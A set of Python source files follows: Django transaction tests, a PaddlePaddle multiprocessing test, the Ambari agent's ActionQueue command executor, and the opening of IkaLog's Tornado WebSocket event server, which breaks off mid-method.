class AtomicInsideTransactionTests(AtomicTests):
"""All basic tests for atomic should also pass within an existing transaction."""
def setUp(self):
self.atomic = transaction.atomic()
self.atomic.__enter__()
def tearDown(self):
self.atomic.__exit__(*sys.exc_info())
@skipIf(connection.features.autocommits_when_autocommit_is_off,
"This test requires a non-autocommit mode that doesn't autocommit.")
class AtomicWithoutAutocommitTests(AtomicTests):
"""All basic tests for atomic should also pass when autocommit is turned off."""
def setUp(self):
transaction.set_autocommit(False)
def tearDown(self):
# The tests access the database after exercising 'atomic', initiating
        # a transaction; a rollback is required before restoring autocommit.
transaction.rollback()
transaction.set_autocommit(True)
@skipUnless(connection.features.uses_savepoints,
"'atomic' requires transactions and savepoints.")
class AtomicMergeTests(TransactionTestCase):
"""Test merging transactions with savepoint=False."""
available_apps = ['transactions']
def test_merged_outer_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Calculus")
raise Exception("Oops, that's his last name")
                # The third insert couldn't be rolled back. Temporarily mark the
# connection as not needing rollback to check it.
self.assertTrue(transaction.get_rollback())
transaction.set_rollback(False)
self.assertEqual(Reporter.objects.count(), 3)
transaction.set_rollback(True)
            # The second insert couldn't be rolled back. Temporarily mark the
# connection as not needing rollback to check it.
self.assertTrue(transaction.get_rollback())
transaction.set_rollback(False)
self.assertEqual(Reporter.objects.count(), 3)
transaction.set_rollback(True)
# The first block has a savepoint and must roll back.
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_merged_inner_savepoint_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with transaction.atomic():
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Calculus")
raise Exception("Oops, that's his last name")
                # The third insert couldn't be rolled back. Temporarily mark the
# connection as not needing rollback to check it.
self.assertTrue(transaction.get_rollback())
transaction.set_rollback(False)
self.assertEqual(Reporter.objects.count(), 3)
transaction.set_rollback(True)
# The second block has a savepoint and must roll back.
self.assertEqual(Reporter.objects.count(), 1)
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
@skipUnless(connection.features.uses_savepoints,
"'atomic' requires transactions and savepoints.")
class AtomicErrorsTests(TransactionTestCase):
available_apps = ['transactions']
def test_atomic_prevents_setting_autocommit(self):
autocommit = transaction.get_autocommit()
with transaction.atomic():
with self.assertRaises(transaction.TransactionManagementError):
transaction.set_autocommit(not autocommit)
# Make sure autocommit wasn't changed.
self.assertEqual(connection.autocommit, autocommit)
def test_atomic_prevents_calling_transaction_methods(self):
with transaction.atomic():
with self.assertRaises(transaction.TransactionManagementError):
transaction.commit()
with self.assertRaises(transaction.TransactionManagementError):
transaction.rollback()
def test_atomic_prevents_queries_in_broken_transaction(self):
r1 = Reporter.objects.create(first_name="Archibald", last_name="Haddock")
with transaction.atomic():
r2 = Reporter(first_name="Cuthbert", last_name="Calculus", id=r1.id)
with self.assertRaises(IntegrityError):
r2.save(force_insert=True)
# The transaction is marked as needing rollback.
with self.assertRaises(transaction.TransactionManagementError):
r2.save(force_update=True)
self.assertEqual(Reporter.objects.get(pk=r1.pk).last_name, "Haddock")
@skipIfDBFeature('atomic_transactions')
def test_atomic_allows_queries_after_fixing_transaction(self):
r1 = Reporter.objects.create(first_name="Archibald", last_name="Haddock")
with transaction.atomic():
r2 = Reporter(first_name="Cuthbert", last_name="Calculus", id=r1.id)
with self.assertRaises(IntegrityError):
r2.save(force_insert=True)
# Mark the transaction as no longer needing rollback.
transaction.set_rollback(False)
r2.save(force_update=True)
self.assertEqual(Reporter.objects.get(pk=r1.pk).last_name, "Calculus")
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_atomic_prevents_queries_in_broken_transaction_after_client_close(self):
with transaction.atomic():
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
connection.close()
# The connection is closed and the transaction is marked as
# needing rollback. This will raise an InterfaceError on databases
# that refuse to create cursors on closed connections (PostgreSQL)
# and a TransactionManagementError on other databases.
with self.assertRaises(Error):
Reporter.objects.create(first_name="Cuthbert", last_name="Calculus")
        # The connection is usable again.
self.assertEqual(Reporter.objects.count(), 0)
@skipUnless(connection.vendor == 'mysql', "MySQL-specific behaviors")
class AtomicMySQLTests(TransactionTestCase):
available_apps = ['transactions']
@skipIf(threading is None, "Test requires threading")
def test_implicit_savepoint_rollback(self):
"""MySQL implicitly rolls back savepoints when it deadlocks (#22291)."""
other_thread_ready = threading.Event()
def other_thread():
try:
with transaction.atomic():
Reporter.objects.create(id=1, first_name="Tintin")
other_thread_ready.set()
# We cannot synchronize the two threads with an event here
# because the main thread locks. Sleep for a little while.
time.sleep(1)
# 2) ... and this line deadlocks. (see below for 1)
Reporter.objects.exclude(id=1).update(id=2)
finally:
# This is the thread-local connection, not the main connection.
connection.close()
other_thread = threading.Thread(target=other_thread)
other_thread.start()
other_thread_ready.wait()
with six.assertRaisesRegex(self, OperationalError, 'Deadlock found'):
# Double atomic to enter a transaction and create a savepoint.
with transaction.atomic():
with transaction.atomic():
# 1) This line locks... (see above for 2)
Reporter.objects.create(id=1, first_name="Tintin")
other_thread.join()
class AtomicMiscTests(TransactionTestCase):
available_apps = []
def test_wrap_callable_instance(self):
# Regression test for #20028
class Callable(object):
def __call__(self):
pass
# Must not raise an exception
transaction.atomic(Callable())
@skipUnlessDBFeature('can_release_savepoints')
def test_atomic_does_not_leak_savepoints_on_failure(self):
# Regression test for #23074
# Expect an error when rolling back a savepoint that doesn't exist.
# Done outside of the transaction block to ensure proper recovery.
with self.assertRaises(Error):
# Start a plain transaction.
with transaction.atomic():
# Swallow the intentional error raised in the sub-transaction.
with six.assertRaisesRegex(self, Exception, "Oops"):
# Start a sub-transaction with a savepoint.
with transaction.atomic():
sid = connection.savepoint_ids[-1]
raise Exception("Oops")
# This is expected to fail because the savepoint no longer exists.
connection.savepoint_rollback(sid)
|
test_paddle_multiprocessing.py
|
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import gc
import sys
import unittest
import time
import paddle
import paddle.incubate.multiprocessing as mp
from paddle.fluid.framework import _test_eager_guard, _in_legacy_dygraph, in_dygraph_mode, _enable_legacy_dygraph
REPEAT = 20
HAS_SHM_FILES = os.path.isdir('/dev/shm')
def fill_tensor(queue, event):
# make sure run in legacy dygraph
if in_dygraph_mode():
_enable_legacy_dygraph()
data = queue.get()
with paddle.no_grad():
data[0][:] = 5
data[1][:] = 5
event.set()
def send_tensor(queue, event, device, dtype):
tensor = paddle.ones([5, 5], dtype=dtype)
queue.put(tensor)
queue.put(tensor)
event.wait()
def send_parambase(queue, event, device, dtype):
tensor = paddle.nn.Layer().create_parameter(
[5, 5],
dtype=dtype,
default_initializer=paddle.nn.initializer.Constant(value=1.0))
queue.put(tensor)
queue.put(tensor)
event.wait()
class leak_checker(object):
def __init__(self, test_case):
self.checked_pids = [os.getpid()]
self.test_case = test_case
def __enter__(self):
self.next_fds = self._get_next_fds(10)
return self
def __exit__(self, *args):
if args[0] is None:
self.test_case.assertFalse(self.has_shm_files())
return False
def check_pid(self, pid):
self.checked_pids.append(pid)
def _get_next_fds(self, n=1):
fds = [os.dup(0) for i in range(n)]
for fd in fds:
os.close(fd)
return fds
def has_shm_files(self, wait=True):
if not HAS_SHM_FILES:
return False
result = self._has_shm_files()
if result and wait:
time.sleep(0.5)
return self._has_shm_files()
return result
def _has_shm_files(self):
gc.collect()
names = ['paddle_' + str(pid) for pid in self.checked_pids]
for filename in os.listdir('/dev/shm'):
for name in names:
if filename.startswith(name):
print("have", filename)
return True
return False
class TestMultiprocessingBase(unittest.TestCase):
def get_tensor(self, device="cpu"):
self.device = device.lower()
place = None
tensor = paddle.zeros([5, 5], dtype="float32")
return tensor
def get_parameter(self):
w = paddle.nn.Layer().create_parameter(
[10, 10],
default_initializer=paddle.nn.initializer.Constant(value=0.0))
return w
def _test_empty(self, dtype="float32"):
q = mp.Queue()
empty = paddle.to_tensor([], dtype=dtype)
q.put(empty)
out = q.get(timeout=1)
self.assertEqual(str(out), str(empty))
def _test_sharing(self,
ctx=mp,
device='cpu',
dtype="float32",
repeat=1,
param=False):
def test_fill():
if param:
x = self.get_parameter()
y = (x[:, 1]).detach()
else:
x = self.get_tensor()
y = x[:, 1]
data = [x, y]
queue = ctx.Queue()
event = ctx.Event()
queue.put(data)
process = ctx.Process(target=fill_tensor, args=(queue, event))
process.daemon = True
lc.check_pid(process.pid)
process.start()
event.wait(30)
self.assertTrue(event.is_set())
self.assertTrue(data[0].equal(5).all())
self.assertTrue(data[1].equal(5).all())
process.join(1 if device != "gpu" else 10)
self.assertFalse(process.is_alive())
def test_receive():
queue = ctx.Queue()
event = ctx.Event()
process = ctx.Process(
target=send_parambase if param else send_tensor,
args=(queue, event, device, dtype))
process.daemon = True
lc.check_pid(process.pid)
process.start()
t1 = queue.get()
t2 = queue.get()
self.assertTrue(t1.equal(1).all())
del t1, t2
event.set()
process.join(1 if device != "gpu" else 10)
self.assertFalse(process.is_alive())
with leak_checker(self) as lc:
for _ in range(repeat):
test_fill()
test_receive()
class TestMultiprocessingCpu(TestMultiprocessingBase):
def func_test_pass_tensor(self):
if in_dygraph_mode():
return
paddle.set_device("cpu")
self._test_sharing(repeat=REPEAT)
def test_pass_tensor(self):
with _test_eager_guard():
self.func_test_pass_tensor()
self.func_test_pass_tensor()
def func_test_pass_parambase(self):
if in_dygraph_mode():
return
paddle.set_device("cpu")
self._test_sharing(repeat=1, param=True)
def test_pass_parambase(self):
with _test_eager_guard():
self.func_test_pass_parambase()
self.func_test_pass_parambase()
def func_test_pass_empty(self):
if in_dygraph_mode():
return
paddle.set_device("cpu")
self._test_empty()
def test_pass_empty(self):
with _test_eager_guard():
self.func_test_pass_empty()
self.func_test_pass_empty()
class TestMultiprocessingGpu(TestMultiprocessingBase):
@unittest.skipIf(not paddle.fluid.core.is_compiled_with_cuda(),
"core is not compiled with CUDA")
def func_test_pass_tensor(self):
if in_dygraph_mode():
return
paddle.set_device("gpu")
self._test_sharing(mp.get_context("spawn"), "gpu")
def test_pass_tensor(self):
with _test_eager_guard():
self.func_test_pass_tensor()
self.func_test_pass_tensor()
if __name__ == "__main__":
unittest.main()
|
ActionQueue.py
|
#!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import Queue
import logging
import traceback
import threading
import pprint
import os
import ambari_simplejson as json
import time
import signal
from AgentException import AgentException
from LiveStatus import LiveStatus
from ActualConfigHandler import ActualConfigHandler
from ambari_agent.BackgroundCommandExecutionHandle import BackgroundCommandExecutionHandle
from ambari_commons.str_utils import split_on_chunks
from resource_management.libraries.script import Script
logger = logging.getLogger()
installScriptHash = -1
MAX_SYMBOLS_PER_LOG_MESSAGE = 7900
class ActionQueue(threading.Thread):
""" Action Queue for the agent. We pick one command at a time from the queue
  and execute it.
  Note: the terms "action" and "command" are used interchangeably in this and related classes.
"""
# How many actions can be performed in parallel. Feel free to change
MAX_CONCURRENT_ACTIONS = 5
  # How much time (in seconds) we need to wait for a new incoming execution command before checking
  # the status command queue
EXECUTION_COMMAND_WAIT_TIME = 2
STATUS_COMMAND = 'STATUS_COMMAND'
EXECUTION_COMMAND = 'EXECUTION_COMMAND'
AUTO_EXECUTION_COMMAND = 'AUTO_EXECUTION_COMMAND'
BACKGROUND_EXECUTION_COMMAND = 'BACKGROUND_EXECUTION_COMMAND'
ROLE_COMMAND_INSTALL = 'INSTALL'
ROLE_COMMAND_START = 'START'
ROLE_COMMAND_STOP = 'STOP'
ROLE_COMMAND_CUSTOM_COMMAND = 'CUSTOM_COMMAND'
CUSTOM_COMMAND_RESTART = 'RESTART'
CUSTOM_COMMAND_START = ROLE_COMMAND_START
IN_PROGRESS_STATUS = 'IN_PROGRESS'
COMPLETED_STATUS = 'COMPLETED'
FAILED_STATUS = 'FAILED'
def __init__(self, initializer_module):
super(ActionQueue, self).__init__()
self.commandQueue = Queue.Queue()
self.backgroundCommandQueue = Queue.Queue()
self.commandStatuses = initializer_module.commandStatuses
self.config = initializer_module.config
self.recovery_manager = initializer_module.recovery_manager
self.configTags = {}
self.stop_event = initializer_module.stop_event
self.tmpdir = self.config.get('agent', 'prefix')
self.customServiceOrchestrator = initializer_module.customServiceOrchestrator
self.parallel_execution = self.config.get_parallel_exec_option()
if self.parallel_execution == 1:
logger.info("Parallel execution is enabled, will execute agent commands in parallel")
self.lock = threading.Lock()
def put(self, commands):
for command in commands:
if not command.has_key('serviceName'):
command['serviceName'] = "null"
if not command.has_key('clusterId'):
command['clusterId'] = "null"
logger.info("Adding " + command['commandType'] + " for role " + \
command['role'] + " for service " + \
command['serviceName'] + " of cluster_id " + \
command['clusterId'] + " to the queue.")
if command['commandType'] == self.BACKGROUND_EXECUTION_COMMAND :
self.backgroundCommandQueue.put(self.createCommandHandle(command))
else:
self.commandQueue.put(command)
def interrupt(self):
self.commandQueue.put(None)
def cancel(self, commands):
for command in commands:
logger.info("Canceling command with taskId = {tid}".format(tid = str(command['target_task_id'])))
logger.debug(pprint.pformat(command))
task_id = command['target_task_id']
reason = command['reason']
# Remove from the command queue by task_id
queue = self.commandQueue
self.commandQueue = Queue.Queue()
while not queue.empty():
queued_command = queue.get(False)
if queued_command['taskId'] != task_id:
self.commandQueue.put(queued_command)
else:
logger.info("Canceling " + queued_command['commandType'] + \
" for service " + queued_command['serviceName'] + \
" and role " + queued_command['role'] + \
" with taskId " + str(queued_command['taskId']))
# Kill if in progress
self.customServiceOrchestrator.cancel_command(task_id, reason)
def run(self):
try:
while not self.stop_event.is_set():
self.processBackgroundQueueSafeEmpty()
self.fillRecoveryCommands()
try:
if self.parallel_execution == 0:
command = self.commandQueue.get(True, self.EXECUTION_COMMAND_WAIT_TIME)
if command == None:
break
self.process_command(command)
else:
# If parallel execution is enabled, just kick off all available
# commands using separate threads
while not self.stop_event.is_set():
command = self.commandQueue.get(True, self.EXECUTION_COMMAND_WAIT_TIME)
if command == None:
break
              # If the command is not retry-enabled then do not start it in parallel.
              # Checking just one command is enough, as all commands for a stage are sent
              # at the same time and retry is only enabled for the initial start/install.
retryAble = False
if 'commandParams' in command and 'command_retry_enabled' in command['commandParams']:
retryAble = command['commandParams']['command_retry_enabled'] == "true"
if retryAble:
logger.info("Kicking off a thread for the command, id=" +
str(command['commandId']) + " taskId=" + str(command['taskId']))
t = threading.Thread(target=self.process_command, args=(command,))
t.daemon = True
t.start()
else:
self.process_command(command)
break
pass
pass
except (Queue.Empty):
pass
except:
logger.exception("ActionQueue thread failed with exception:")
raise
logger.info("ActionQueue thread has successfully finished")
def fillRecoveryCommands(self):
if not self.tasks_in_progress_or_pending():
self.put(self.recovery_manager.get_recovery_commands())
def processBackgroundQueueSafeEmpty(self):
while not self.backgroundCommandQueue.empty():
try:
command = self.backgroundCommandQueue.get(False)
if command.has_key('__handle') and command['__handle'].status == None:
self.process_command(command)
except Queue.Empty:
pass
def createCommandHandle(self, command):
if command.has_key('__handle'):
raise AgentException("Command already has __handle")
command['__handle'] = BackgroundCommandExecutionHandle(command, command['commandId'], None, self.on_background_command_complete_callback)
return command
def process_command(self, command):
# make sure we log failures
commandType = command['commandType']
logger.debug("Took an element of Queue (command type = %s)." % commandType)
try:
if commandType in [self.EXECUTION_COMMAND, self.BACKGROUND_EXECUTION_COMMAND, self.AUTO_EXECUTION_COMMAND]:
try:
if self.recovery_manager.enabled():
self.recovery_manager.on_execution_command_start()
self.recovery_manager.process_execution_command(command)
self.execute_command(command)
finally:
if self.recovery_manager.enabled():
self.recovery_manager.on_execution_command_finish()
else:
logger.error("Unrecognized command " + pprint.pformat(command))
except Exception:
logger.exception("Exception while processing {0} command".format(commandType))
def tasks_in_progress_or_pending(self):
return not self.commandQueue.empty() or self.recovery_manager.has_active_command()
def execute_command(self, command):
'''
Executes commands of type EXECUTION_COMMAND
'''
clusterId = command['clusterId']
commandId = command['commandId']
isCommandBackground = command['commandType'] == self.BACKGROUND_EXECUTION_COMMAND
isAutoExecuteCommand = command['commandType'] == self.AUTO_EXECUTION_COMMAND
message = "Executing command with id = {commandId}, taskId = {taskId} for role = {role} of " \
"cluster_id {cluster}.".format(
commandId = str(commandId), taskId = str(command['taskId']),
role=command['role'], cluster=clusterId)
logger.info(message)
taskId = command['taskId']
# Preparing 'IN_PROGRESS' report
in_progress_status = self.commandStatuses.generate_report_template(command)
    # The paths of the files that contain the output log and error log use a prefix that the agent advertises to the
    # server. The prefix is defined in agent-config.ini
if not isAutoExecuteCommand:
in_progress_status.update({
'tmpout': self.tmpdir + os.sep + 'output-' + str(taskId) + '.txt',
'tmperr': self.tmpdir + os.sep + 'errors-' + str(taskId) + '.txt',
'structuredOut' : self.tmpdir + os.sep + 'structured-out-' + str(taskId) + '.json',
'status': self.IN_PROGRESS_STATUS
})
else:
in_progress_status.update({
'tmpout': self.tmpdir + os.sep + 'auto_output-' + str(taskId) + '.txt',
'tmperr': self.tmpdir + os.sep + 'auto_errors-' + str(taskId) + '.txt',
'structuredOut' : self.tmpdir + os.sep + 'auto_structured-out-' + str(taskId) + '.json',
'status': self.IN_PROGRESS_STATUS
})
self.commandStatuses.put_command_status(command, in_progress_status)
numAttempts = 0
retryDuration = 0 # even with 0 allow one attempt
retryAble = False
delay = 1
log_command_output = True
if 'commandParams' in command and 'log_output' in command['commandParams'] and "false" == command['commandParams']['log_output']:
log_command_output = False
if 'commandParams' in command:
if 'max_duration_for_retries' in command['commandParams']:
retryDuration = int(command['commandParams']['max_duration_for_retries'])
if 'command_retry_enabled' in command['commandParams']:
retryAble = command['commandParams']['command_retry_enabled'] == "true"
if isAutoExecuteCommand:
retryAble = False
logger.info("Command execution metadata - taskId = {taskId}, retry enabled = {retryAble}, max retry duration (sec) = {retryDuration}, log_output = {log_command_output}".
format(taskId=taskId, retryAble=retryAble, retryDuration=retryDuration, log_command_output=log_command_output))
command_canceled = False
while retryDuration >= 0:
numAttempts += 1
start = 0
if retryAble:
start = int(time.time())
# running command
commandresult = self.customServiceOrchestrator.runCommand(command,
in_progress_status['tmpout'],
in_progress_status['tmperr'],
override_output_files=numAttempts == 1,
retry=numAttempts > 1)
end = 1
if retryAble:
end = int(time.time())
retryDuration -= (end - start)
# dumping results
if isCommandBackground:
logger.info("Command is background command, quit retrying. Exit code: {exitCode}, retryAble: {retryAble}, retryDuration (sec): {retryDuration}, last delay (sec): {delay}"
.format(cid=taskId, exitCode=commandresult['exitcode'], retryAble=retryAble, retryDuration=retryDuration, delay=delay))
return
else:
if commandresult['exitcode'] == 0:
status = self.COMPLETED_STATUS
else:
status = self.FAILED_STATUS
if (commandresult['exitcode'] == -signal.SIGTERM) or (commandresult['exitcode'] == -signal.SIGKILL):
logger.info('Command with taskId = {cid} was canceled!'.format(cid=taskId))
command_canceled = True
break
if status != self.COMPLETED_STATUS and retryAble and retryDuration > 0:
delay = self.get_retry_delay(delay)
if delay > retryDuration:
delay = retryDuration
retryDuration -= delay # allow one last attempt
commandresult['stderr'] += "\n\nCommand failed. Retrying command execution ...\n\n"
logger.info("Retrying command with taskId = {cid} after a wait of {delay}".format(cid=taskId, delay=delay))
if 'agentLevelParams' not in command:
command['agentLevelParams'] = {}
command['agentLevelParams']['commandBeingRetried'] = "true"
time.sleep(delay)
continue
else:
logger.info("Quit retrying for command with taskId = {cid}. Status: {status}, retryAble: {retryAble}, retryDuration (sec): {retryDuration}, last delay (sec): {delay}"
.format(cid=taskId, status=status, retryAble=retryAble, retryDuration=retryDuration, delay=delay))
break
# do not fail task which was rescheduled from server
if command_canceled:
with self.lock:
with self.commandQueue.mutex:
for com in self.commandQueue.queue:
if com['taskId'] == command['taskId']:
logger.info('Command with taskId = {cid} was rescheduled by server. '
'Fail report on cancelled command won\'t be sent with heartbeat.'.format(cid=taskId))
return
# final result to stdout
commandresult['stdout'] += '\n\nCommand completed successfully!\n' if status == self.COMPLETED_STATUS else '\n\nCommand failed after ' + str(numAttempts) + ' tries\n'
logger.info('Command with taskId = {cid} completed successfully!'.format(cid=taskId) if status == self.COMPLETED_STATUS else 'Command with taskId = {cid} failed after {attempts} tries'.format(cid=taskId, attempts=numAttempts))
roleResult = self.commandStatuses.generate_report_template(command)
roleResult.update({
'stdout': commandresult['stdout'],
'stderr': commandresult['stderr'],
'exitCode': commandresult['exitcode'],
'status': status,
})
if self.config.has_option("logging","log_command_executes") \
and int(self.config.get("logging", "log_command_executes")) == 1 \
and log_command_output:
if roleResult['stdout'] != '':
logger.info("Begin command output log for command with id = " + str(command['taskId']) + ", role = "
+ command['role'] + ", roleCommand = " + command['roleCommand'])
self.log_command_output(roleResult['stdout'], str(command['taskId']))
logger.info("End command output log for command with id = " + str(command['taskId']) + ", role = "
+ command['role'] + ", roleCommand = " + command['roleCommand'])
if roleResult['stderr'] != '':
logger.info("Begin command stderr log for command with id = " + str(command['taskId']) + ", role = "
+ command['role'] + ", roleCommand = " + command['roleCommand'])
self.log_command_output(roleResult['stderr'], str(command['taskId']))
logger.info("End command stderr log for command with id = " + str(command['taskId']) + ", role = "
+ command['role'] + ", roleCommand = " + command['roleCommand'])
if roleResult['stdout'] == '':
roleResult['stdout'] = 'None'
if roleResult['stderr'] == '':
roleResult['stderr'] = 'None'
# let ambari know name of custom command
if 'commandParams' in command and command['commandParams'].has_key('custom_command'):
roleResult['customCommand'] = command['commandParams']['custom_command']
if 'structuredOut' in commandresult:
roleResult['structuredOut'] = str(json.dumps(commandresult['structuredOut']))
else:
roleResult['structuredOut'] = ''
# let recovery manager know the current state
if status == self.COMPLETED_STATUS:
# let ambari know that configuration tags were applied
configHandler = ActualConfigHandler(self.config, self.configTags)
"""
#update
if 'commandParams' in command:
command_params = command['commandParams']
if command_params and command_params.has_key('forceRefreshConfigTags') and len(command_params['forceRefreshConfigTags']) > 0 :
forceRefreshConfigTags = command_params['forceRefreshConfigTags'].split(',')
logger.info("Got refresh additional component tags command")
for configTag in forceRefreshConfigTags :
configHandler.update_component_tag(command['role'], configTag, command['configurationTags'][configTag])
roleResult['customCommand'] = self.CUSTOM_COMMAND_RESTART # force restart for component to evict stale_config on server side
command['configurationTags'] = configHandler.read_actual_component(command['role'])
if command.has_key('configurationTags'):
configHandler.write_actual(command['configurationTags'])
roleResult['configurationTags'] = command['configurationTags']
component = {'serviceName':command['serviceName'],'componentName':command['role']}
if 'roleCommand' in command and \
(command['roleCommand'] == self.ROLE_COMMAND_START or
(command['roleCommand'] == self.ROLE_COMMAND_INSTALL and component in LiveStatus.CLIENT_COMPONENTS) or
(command['roleCommand'] == self.ROLE_COMMAND_CUSTOM_COMMAND and
'custom_command' in command['hostLevelParams'] and
command['hostLevelParams']['custom_command'] in (self.CUSTOM_COMMAND_RESTART, self.CUSTOM_COMMAND_START))):
configHandler.write_actual_component(command['role'],
command['configurationTags'])
if 'clientsToUpdateConfigs' in command['hostLevelParams'] and command['hostLevelParams']['clientsToUpdateConfigs']:
configHandler.write_client_components(command['serviceName'],
command['configurationTags'],
command['hostLevelParams']['clientsToUpdateConfigs'])
roleResult['configurationTags'] = configHandler.read_actual_component(
command['role'])
"""
self.recovery_manager.process_execution_command_result(command, status)
self.commandStatuses.put_command_status(command, roleResult)
def log_command_output(self, text, taskId):
"""
    Logs a message as multiple enumerated log messages, each no larger than MAX_SYMBOLS_PER_LOG_MESSAGE.
    This is very useful when logs are redirected to syslog (syslog_enabled=1), since syslog usually
    truncates long messages.
"""
chunks = split_on_chunks(text, MAX_SYMBOLS_PER_LOG_MESSAGE)
if len(chunks) > 1:
for i in range(len(chunks)):
logger.info("Cmd log for taskId={0} and chunk {1}/{2} of log for command: \n".format(taskId, i+1, len(chunks)) + chunks[i])
else:
logger.info("Cmd log for taskId={0}: ".format(taskId) + text)
def get_retry_delay(self, last_delay):
"""
    Returns an exponentially growing delay. The idea is that if the number of retries is high, the
    reason for retrying is probably a host- or environment-specific issue that requires longer waits.
"""
return last_delay * 2
def command_was_canceled(self):
self.customServiceOrchestrator
def on_background_command_complete_callback(self, process_condensed_result, handle):
logger.debug('Start callback: %s' % process_condensed_result)
logger.debug('The handle is: %s' % handle)
status = self.COMPLETED_STATUS if handle.exitCode == 0 else self.FAILED_STATUS
aborted_postfix = self.customServiceOrchestrator.command_canceled_reason(handle.command['taskId'])
if aborted_postfix:
status = self.FAILED_STATUS
logger.debug('Set status to: %s , reason = %s' % (status, aborted_postfix))
else:
aborted_postfix = ''
roleResult = self.commandStatuses.generate_report_template(handle.command)
roleResult.update({
'stdout': process_condensed_result['stdout'] + aborted_postfix,
'stderr': process_condensed_result['stderr'] + aborted_postfix,
'exitCode': process_condensed_result['exitcode'],
'structuredOut': str(json.dumps(process_condensed_result['structuredOut'])) if 'structuredOut' in process_condensed_result else '',
'status': status,
})
self.commandStatuses.put_command_status(handle.command, roleResult)
def execute_status_command_and_security_status(self, command):
component_status_result = self.customServiceOrchestrator.requestComponentStatus(command)
return command, component_status_result
def status_update_callback(self):
"""
Actions that are executed every time when command status changes
"""
self.controller.trigger_heartbeat()
# Removes all commands from the queue
def reset(self):
queue = self.commandQueue
with queue.mutex:
queue.queue.clear()
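# --- Illustrative sketch (not part of the Ambari agent) ----------------------
# execute_command() above retries a failed command while a
# max_duration_for_retries budget remains, doubling the wait via
# get_retry_delay() and clamping it to the remaining budget. The loop below
# reproduces only that timing logic (ignoring command run time) for an
# assumed 60 second budget, just to make the schedule visible.
if __name__ == '__main__':
  delay, budget = 1, 60
  schedule = []
  while budget > 0:
    delay = min(delay * 2, budget)  # doubling + clamping, as in execute_command
    schedule.append(delay)
    budget -= delay
  print(schedule)  # -> [2, 4, 8, 16, 30]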
|
websocket_server.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# IkaLog
# ======
# Copyright (C) 2015 Takeshi HASEGAWA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import os
import sys
import threading
import time
# Needed in GUI mode
try:
import wx
except:
pass
try:
import tornado.ioloop
import tornado.web
import tornado.websocket
import tornado.template
_tornado_imported = True
except:
_tornado_imported = False
from ikalog.utils import *
_ = Localization.gettext_translation('websocket_server', fallback=True).gettext
# IkaLog Output Plugin: WebSocket server.
websockets = []
class IndexHandler(tornado.web.RequestHandler):
@tornado.web.asynchronous
def get(self):
# For testing....
self.render("index.html")
class WebSocketHandler(tornado.websocket.WebSocketHandler):
def check_origin(self, origin):
print('%s: origin %s' % (self, origin))
return True
def open(self):
IkaUtils.dprint("%s: Connected" % self)
websockets.append(self)
def on_message(self, message):
pass
def on_close(self):
IkaUtils.dprint("%s: Closed" % self)
del websockets[websockets.index(self)]
class WebSocketServer(object):
def _send_message(self, d):
if len(websockets) == 0:
return
IkaUtils.dprint('%s: number of websockets = %d' %
(self, len(websockets)))
d_json = json.dumps(d, separators=(',', ':'), ensure_ascii=False)
for s in websockets:
IkaUtils.dprint(' Sending a message to %s' % s)
s.write_message(d_json)
def on_game_killed(self, context):
self._send_message({
'event': 'on_game_killed'
})
def on_game_dead(self, context):
self._send_message({
'event': 'on_game_dead'
})
def on_game_death_reason_identified(self, context):
self._send_message({
'event': 'on_death_reason_identified',
'reason': context['game'].get('last_death_reason', ''),
})
def on_game_go_sign(self, context):
self._send_message({
'event': 'on_game_go_sign'
})
def on_game_start(self, context):
self._send_message({
'event': 'on_game_start',
'stage': IkaUtils.map2id(context['game']['map'], 'unknown'),
'rule': IkaUtils.rule2id(context['game']['rule'], 'unknown'),
})
def on_game_team_color(self, context):
self._send_message({
'event': 'on_game_team_color',
'my_team_color_hsv': context['game']['team_color_hsv'][0].tolist()[0],
'counter_team_color_hsv': context['game']['team_color_hsv'][1].tolist()[0],
})
def on_lobby_matching(self, context):
self._send_message({
'event': 'on_lobby_matching',
'lobby_state': context['lobby'].get('state', None),
'lobby_type': context['lobby'].get('type', None),
})
def on_lobby_matched(self, context):
self._send_message({
'event': 'on_lobby_matched',
'lobby_state': context['lobby'].get('state', None),
'lobby_type': context['lobby'].get('type', None),
})
def on_game_finish(self, context):
self._send_message({
'event': 'on_game_finish',
})
# Common events to ranked battles.
def on_game_ranked_we_lead(self, context):
self._send_message({'event': 'on_game_ranked_we_lead'})
def on_game_ranked_they_lead(self, context):
self._send_message({'event': 'on_game_ranked_they_lead'})
# Ranked, Splatzone battles
def on_game_splatzone_we_got(self, context):
